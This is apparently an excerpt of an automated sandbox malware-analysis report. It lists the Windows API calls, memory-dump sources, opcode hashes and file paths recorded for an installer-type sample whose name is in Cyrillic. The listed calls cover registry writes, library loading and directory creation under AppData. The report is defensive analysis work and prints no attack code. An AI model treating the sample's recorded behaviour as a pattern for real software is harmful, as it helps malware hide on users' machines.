                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3962662361-3916222277
                                                                                                                                                                                                                    • Opcode ID: e51a39ba9ebe644e1251ce4111efe9902389760dc23605d10324e61ccfc13c61
                                                                                                                                                                                                                    • Instruction ID: ea1b800076a0d061ab580246863b022078bead785b84868c0a7ad9c85ce0171a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e51a39ba9ebe644e1251ce4111efe9902389760dc23605d10324e61ccfc13c61
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6941B1B140034EABEF149F749884BD637A8BF05B16F148166E9559E5C6DBB8F0C4CFA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                                                      • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                    • String ID: x(y
                                                                                                                                                                                                                    • API String ID: 334405425-3509028808
                                                                                                                                                                                                                    • Opcode ID: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                                                                                                                                                                                                    • Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsk21A3.tmp
                                                                                                                                                                                                                    • API String ID: 2655323295-1334823647
                                                                                                                                                                                                                    • Opcode ID: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                                                                                                                                                                                    • Instruction ID: 076fdad28fc4eb621c0ae83062707e46e05f76c541c0890e85279b1380dde0ba
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1118471D00108BEEB10AFA5DE89EAEBA74EB44754F15803BF504F71D1DBB48D409B28
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00792878), ref: 00401BE7
                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$AllocFree
                                                                                                                                                                                                                    • String ID: Call$x(y
                                                                                                                                                                                                                    • API String ID: 3394109436-3442700008
                                                                                                                                                                                                                    • Opcode ID: f905998698a718dc4cf1a42dfb633cd665eb9fc086c23fd15b54cbfec95e9be3
                                                                                                                                                                                                                    • Instruction ID: fc266f0b09462df108d5b450fd3a6dc377bab1f5c412968f7868140de6343470
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f905998698a718dc4cf1a42dfb633cd665eb9fc086c23fd15b54cbfec95e9be3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521A572610100EBCB10EB94DEC995E73A9EB49318B25013FF106F32D0DBB9A8519BAD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$Enum
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 464197530-0
                                                                                                                                                                                                                    • Opcode ID: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                                                    • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,77573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,77573420,00000000), ref: 00405C48
                                                                                                                                                                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                      • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns, xrefs: 00401640
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns
                                                                                                                                                                                                                    • API String ID: 1892508949-3678015398
                                                                                                                                                                                                                    • Opcode ID: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                                                                                                                                                                                    • Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 004052C5
                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                                                                                                                                                                      • Part of subcall function 0040427D: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                    • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                                                                                                    • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Enum$CloseValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 397863658-0
                                                                                                                                                                                                                    • Opcode ID: a7693fd32bbd6dda220c639d5c72a78338338ff509cc745735d7ea4ec565f031
                                                                                                                                                                                                                    • Instruction ID: be079dd98ee366e8112d1373a1392f52e75f7f4d5f65991111ca301d6a19f001
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7693fd32bbd6dda220c639d5c72a78338338ff509cc745735d7ea4ec565f031
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E018471904204BFEB149F95DE88ABF7ABCEF80358F14403EF505B61D0DAB85E419B69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3356406503-0
                                                                                                                                                                                                                    • Opcode ID: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                                                                                                                                                                                                    • Instruction ID: 794a7caf9ed311c3342b46d24488b6d71e3894ac8d4f1441d9e09f9d9ce2e922
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A411A731D14205EBDF14DFA4CA585AE77B4EF44348F21843FE445B72C0D6B89A41EB59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                    • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                                                                                                    • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseDeleteValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2831762973-0
                                                                                                                                                                                                                    • Opcode ID: 49dd4a4acbc57048e4a2cad6fc2e9fcf4131624f7ebcfe3fd0f4b4026ebfb941
                                                                                                                                                                                                                    • Instruction ID: 2791961e855c801182d2f4b3e101f078c994d4f4985963d794b0561754721dd9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49dd4a4acbc57048e4a2cad6fc2e9fcf4131624f7ebcfe3fd0f4b4026ebfb941
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6F09632E045119BE704BBA49B8EABE72A89B44354F29403FFE42F71C1CAF85D41676D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$EnableShow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1136574915-0
                                                                                                                                                                                                                    • Opcode ID: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                                                                                                                                                                                    • Instruction ID: 8ee55578b336c0276868c1e88f1fd45be51d25fee0972e3c110634e7b38d832d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BE01A72E082008FE724ABA5AA495AD77B8EB90325B20847FE211F11D1DA7858419F69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                      • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                                                      • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                                                      • Part of subcall function 00406624: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                                                                                                    • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                                                                                    • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                                                    • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                                                    • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000), ref: 6F262B6B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                                                                                                                      • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePointerwsprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 327478801-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                                                                                                                                                                                                    Memory Dump Source
